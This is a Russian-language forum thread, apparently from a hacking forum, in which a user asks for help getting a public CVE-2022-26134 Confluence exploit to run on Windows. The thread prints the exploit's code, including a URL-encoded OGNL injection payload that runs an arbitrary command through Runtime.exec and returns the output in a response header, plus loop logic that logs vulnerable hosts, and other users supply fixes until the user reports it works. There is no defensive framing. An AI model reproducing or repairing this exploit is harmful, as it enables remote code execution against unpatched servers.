CVE-2022-26134

bongiorno · 18.09.2022

Пытаюсь реализовать эксп с помощью кода https://github.com/h3v0x/CVE-2022-26134 на линуксе запускается без ошибок, на винде же выдает следующие ошибки:

И так далее, могу скинуть весь перечень ошибок, как стоит подредактировать? Либо у меня руки не оттуда растут

Th30C0der · 19.09.2022

make sure you are runing under python3 and u have already installed all requirements

Satie · 19.09.2022

24-29 строку копируешь, удаляешь и перемещаешь с отступом под if __name__ == "__main__"

CryNet · 19.09.2022

Satie сказал(а):

24-29 строку копируешь, удаляешь и перемещаешь с отступом под if __name__ == "__main__"

Лол, это таки правда про преднамеренные ошибки

Satie · 19.09.2022

CryNet сказал(а):

Лол, это таки правда про преднамеренные ошибки

Нет, там просто под windows есть отличия вызова пула, это частый баг.

Dropbear · 19.09.2022

Снеси версию 3.10 и поставь 3.8. Это мб поможет как вариант. Если модуля не хватает там другой еррор пишет. Add python to windows path при установке галку ставил?

bongiorno · 19.09.2022

Desoxyn сказал(а):

"на линуксе запускается без ошибок, на винде же выдает следующие" - по идее не работало бы и на никсах. Скорее всего у тс не установлены какие то зависимости(модули), хотя могу и ошибаться.

Я скачал модули все, requests не импортировалось но после обновления pip через директорию питона скачалось, ща покажу

Остальные модули анологично работают

bongiorno · 19.09.2022

Satie сказал(а):

24-29 строку копируешь, удаляешь и перемещаешь с отступом под if __name__ == "_ Сделал вот так(Иначе, как ты сказал там ошибка будет, ибо там 24-29 это 2 разных цикла):

Код:

    if __name__ == "__main__":
        headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36",
               "Connection": "close",
               "Accept-Encoding": "gzip, deflate"}
        try:
            response = requests.get(url + '/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22'+optionsOpt.command+'%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/', headers=headers, verify=False, allow_redirects=False)
            if(response.status_code == 302):
                print('Found: '+url+' // '+ response.headers['X-Cmd-Response'])

                inputBuffer = str(response.headers['X-Cmd-Response'])
                paramResults.append('Vulnerable application found:'+url+'\n''Command result:'+inputBuffer+'\n')
            else:
                pass

bongiorno · 19.09.2022

Теперь выдает ошибку после этого цикла "except requests.exceptions.ConnectionError: SyntaxError: expected 'except' or 'finally' block"
Перед try поставил, все так же

Satie · 19.09.2022

Я ничего не понял, я говорил об изначальном исходнике что на гитхабе.

24-29:

Python:

requestEngine = multiprocessing.Manager()
session = requests.Session()
global paramResults
paramResults = requestEngine.list(
globals().update(locals())

Его нужно удалить там и вынести под name=main:

Python:

if __name__ == "__main__":
    requestEngine = multiprocessing.Manager()
    session = requests.Session()
    global paramResults
    paramResults = requestEngine.list()
    globals().update(locals())
    parser = optparse.OptionParser()

Ибо после старта на windows - requestEngine будет пропадать с области видимости и потому он крашиться.

gorillaz · 19.09.2022

bongiorno сказал(а):

Пытаюсь реализовать эксп с помощью кода https://github.com/h3v0x/CVE-2022-26134 на линуксе запускается без ошибок, на винде же выдает следующие ошибки:
Посмотреть вложение 43197
И так далее, могу скинуть весь перечень ошибок, как стоит подредактировать? Либо у меня руки не оттуда растут

а wsl использоавть

bongiorno · 19.09.2022

Dropbear сказал(а):

Снеси версию 3.10 и поставь 3.8. Это мб поможет как вариант. Если модуля не хватает там другой еррор пишет. Add python to windows path при установке галку ставил?

Версию тоже попробовал менять все так же

bongiorno · 19.09.2022

Satie сказал(а):
Я ничего не понял, я говорил об изначальном исходнике что на гитхабе.

24-29:
Python:
requestEngine = multiprocessing.Manager()
session = requests.Session()
global paramResults
paramResults = requestEngine.list(
globals().update(locals())
Его нужно удалить там и вынести под name=main:
Python:
if __name__ == "__main__":
    requestEngine = multiprocessing.Manager()
    session = requests.Session()
    global paramResults
    paramResults = requestEngine.list()
    globals().update(locals())
    parser = optparse.OptionParser()
Ибо после старта на windows - requestEngine будет пропадать с области видимости и потому он крашиться.

Все работает, большое спасибо

CVE-2022-26134

bongiorno

RAM

Th30C0der

ripper

Satie

RAID-массив

CryNet

RAID-массив

Satie

RAID-массив

Dropbear

(L2) cache

bongiorno

RAM

bongiorno

RAM

bongiorno

RAM

Satie

RAID-массив

gorillaz

HDD-drive

bongiorno

RAM

bongiorno

RAM